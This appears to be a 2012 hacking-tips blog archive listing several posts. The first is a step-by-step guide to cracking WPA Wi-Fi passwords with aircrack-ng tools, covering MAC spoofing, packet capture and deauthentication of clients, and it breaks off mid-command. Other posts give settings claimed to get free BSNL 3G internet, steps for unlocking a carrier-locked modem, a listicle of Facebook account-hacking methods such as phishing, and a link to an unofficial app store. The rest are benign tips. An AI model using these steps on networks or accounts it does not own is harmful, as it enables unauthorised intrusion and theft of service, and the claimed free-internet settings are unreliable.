Posts

Showing posts from October, 2012

How to crack WiFi Password by Backtrack 5

Image
STEPS TO HACK WIFI OR WIRELESS PASSWORD 1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). Download Backtrack Linux Live CD from here:  CLICK HERE Steps to Follow: Step 1 : airmon-ng The result will be something like : Interface    Chipset      Driver wlan0        Intel 5100   iwlagn - [phy0] Step 2 : airmon-ng start wlan0 Step 3 (Optional) : Change the mac address of the mon0 interface. ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up Step 4 : airodump-ng mon0 Then, press " Ctrl+c " to break the program. Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0 *where -c is the channel            -w is the file to be written            --bssid is the BSSID This terminal is keeping running. Step 6 : open another terminal. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID            -c is the cl

download android applications for free

Image
Its officially not known as  Black mart  but its called BlackMart Alpha, it’s a new version which is the improved one and brings many bug fixes. You can Download BlackMart Alpha Android app and than transfer that file to your android device.  Download:- Black Mart Alpha

BSNL 3G Hack 2012 | Unlimited GPRS | Surf Unlimited Internet Hack BSNL

Image
  All Bsnl users new working 3G connection launched by bharathi india Bsnl cellone connection available in prepaid card  also so i examined many test with   BSNL   accessing free 3G internet connection in both mobile and pc and found new trick by changing the 3G  contrition setting  initially have an 3G sim and activated GPRS or 3G connection should be activated in your mobile also supported using this new following connection for free Name :3G free(any) Service Type 1 WAP Getway IP : 110.100.3.2 Port no : 1 : 9209. Timeout: NEVER CSD No.1 User Name1: ppp Password1: ppp123 APN setting: wapwest.cellone.in User Name : ppp Password : ppp123 now save it leave the other  settings  as default and using this activated settings hack bsnl 3G for free new 2012 trick in bsnl mobile free for 3mbps speed browsing and downlods  in bsnl 3G. That's It

Use Any Sim In IDEA Net setter | Unlock Idea Net Setter | Idea Hack|Unlock huawei Data Card

Image
Now a days most of us are using data cards of various companies and one of them is IDEA NETSETTER. Today I’m going to tell, how you can use any other SIM in IDEA NET SETTER and then you can access upto 2mbps via that USB Net setter Netsetter is using a Huawei modem Step 1 :   Download UNIVERSAL MASTER CODE  (software) by THL Step 2 : Now take your USB modem and see its back , you will see a 15 digit number and that’s your modem’s IMEI number . open notpad and type that IMEI no. Step 3 : Now double click on the downloaded file of Universal Master Code and extract it. then click on Universal Master Code.exe Step 4 : In the IMEI number field of Universal Master Codetype , enter the IMEI number which you have already typed in notepad and press  calculate . It will generate a flash and unlock code. Step 5 : Now connect your USB IDEA net setter and install net setter software from there and run it and also put a non IDEA SIM. It will ask you for unlock code , also it

Top 10 Ways How hackers Can Hack Facebook Accounts (latest)

Image
Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers,   hence by the means of this post ..i want to tell you about the top 10 methods which are used by hackers to hack facebook profiles..latest which are still in use in 2012 too.Read it Carefuly and defend yourself ..if you are going to be a victim.(for educational purpose only)   10 Ways How Hackers Can Hack Facebook Accounts In 2011 So here are the top 10 methods which have been the most popular in 2011: 1. Facebook Phishing  Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims " E

site ip

Image
You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address. To run the PING utility, click on the Windows  Start  button, and choose  Run  from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen. Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter: I n this example, the IP address of the host name  www.rkgit.edu.in  is 74.52.201.2  & IP Address of the host name  www.kiet.edu  is 220.225.19.55  

I-Phone Secret Codes

Image
Searching for i phone secret codes, Your search ends here we have brought you the latest codes which work on i phone the codes are Following are the secret codes for your i phone 1) *3001#12345#* and tap Call. Enter Field Mode.Field mode reveals many of the inner settings of your iPhone, specifically up-to-date network and cell information. 2) *#06# Displays your IMEI. No need to tap Call.IMEI is the unique identifier for your cell phone hardware. Together with your SIM information it identifies you to the provider network. 3) *777# and tap Call. Account balance for prepaid iPhone. 4) *225# and tap Call. Bill Balance. (Postpaid only) 5) *646# and tap Call. Check minutes. (Postpaid only)These three are pretty self explanatory. 6) *#21# and tap Call. Setting interrogation for  call forwarding .Discover the settings for your  call forwarding. You’ll see whether you have voice, data, fax, sms, sync, async, packet access, and pad access call forwarding enabled or disabled. 7)

Watch ASCII Star Wars in Windows XP, Vista and 7

Image
Every one of us has watched Star Wars on television, computer or in a theater. It is the same movie with aliens fighting each other for galaxies and such stuff. There is nothing new in it. But wait, have you watched an ASCII(  American Standard  Code for Information Interchange) version of Star Wars and that too in  Windows using   telnet . A word mostly linked with computer wizards. Well if you have not, then you must do it now! There is a complete copy of Star Wars done entirely in ASCII characters that you can watch in theWindows operating system (or any OS that supports  telnet ). The only thing required to watch it is an internet connection; speed does not matter. To watch it on Windows XP, Go to Start, Run. Now type "telnet towel.blinkenlights.nl" without the quotes and press Enter. On Windows 7 and Windows Vista Telnet  is turned off by default in the  latest version windows . So, in order to watch star wars, you must first enable  telnet  by going to Control

Lock/Unlock Computer With Pendrive(USB) in windows

Image
SYSKEY  is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key. SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from Bind  View found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible. Microsoft later collaborated with Bind View to issue a fix for the problem (dubbed the ‘Syskey Bug’) which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack. According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected. So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it req

lock/unlock usb port

Image
Step1:  In Windows 7  press  Windows key+R  and type as “regedit Step 2:  It will open the Registry Editor of  your Windows 7 The Path to go:  “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR” Step 3:  After opening Registry edit browse the following path in reght side bar of registry editor Step4:  Then  right click  the registry “Start” which is rectangled in red color in the below screenshot of registry editor Step:5  Right Click  “Start” and Click modify To enable USB ports:  change the value from “4? to “3? To disable USB ports:  change the Value for “3? to “4? finaly restart your system.Because Restarting Your system Will take The affects of changed registry. .

Any Rar Passwords Protected File

Image
This program recovers forgotten passwords for RAR archives.  Recover  runs in the background and resumes on the next system start-up. When you have completely forgotten a password, Advanced RAR Password Recovery will run a  brute-force  attack that applies all possible combinations one by one. In such a case, you can set the minimum and maximum number of characters and the character sets you used (letters, numbers, and non-English characters). If you recall part of the password, you can restrict the search area with a mask such as  m***l . If you have used a meaningful word for your password, the dictionary attack helps. You can plug in external dictionaries and check all possible lowercase and uppercase combinations. To decrease recoverytime, the program optimizes its code for each type of processor. The trial version limits recovery to three-letter combinations, which doesn't give you the opportunity to fully evaluate performance. If you've forgotten the password for a

block site in firefox

Image
As you Know that,Mozilla Firefox is a most powerful and common browser,which is used by most of the internet users,which is containing millions of addons,which helps the browser to expand its features according to user's requirement.If you want to block some websites in your own mozilla firefox browser.Then this post is for you.Blocksite is one of the firefox add-on which is used to block a  list of website  in firefox.We can also protect it by password, so that others cannot able change the setting or delete the websites without your access.  Follow These Steps to Block any website in mozilla firefox browser 1  First of all  click here  and  Get plugin then Open Firefox browser and click “Tools” and select Add-ons. Type “BlockSite” in the search bar at the top right corner of the window and press “Enter”. 2  Wait for the page to load. In the  search result,  BlockSite will be on the first place. Click the “Install” button next to the BlockSite plugin. It will take les

hide-ip tools

Image
Hey friends, today i am going to share a hack tool that will help you to hide you identity online so that you can surf online anonymously without getting monitored. Do you actually know what your IP address means? Are you aware that your IP address is exposed every time you visit a website?  How you will feel when you come to know that some neighbour is monitoring your home every time? Many websites and hackers use IP address to monitor your home address and other personal information. Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Now as hacker you will never wish that somebody monitor you. So i got a tool called Super Hide IP that will not only hide your identity online but also help you  computer  tracing  cookies. Super Hide IP allows users to surf online anonymously, keeping your Identity and IP address hidden from the third party, protect your personal info

Dangerous Email File Attachments

Image
.reg Possible Windows registry attack .chm Possible compiled Help file-based virus .cnf Possible SpeedDial attack .hta Possible Microsoft HTML archive attack .ins Possible Microsoft Internet Comm. Settings attack .jse Possible Microsoft JScript attack .lnk Possible Eudora *.lnk security hole attack .ma_ Possible Microsoft Access Shortcut attack .pif Possible MS-Dos program shortcut attack .scf Possible Windows Explorer Command attack .sct Possible Microsoft Windows Script Component attack .shb Possible document shortcut attack .shs Possible Shell Scrap Object attack .vbe or .vbs Possible Microsoft  VB  script  attack .wsc .wsf .wsh Possible Microsoft Windows Script Host attack .xnk Possible  Microsoft Exchange Shortcut attack .scr Possible virus hidden in a screensaver .bat Possible malicious batch file script .cmd Possible malicious batch file script .cpl Possible malicious control panel item .mhtm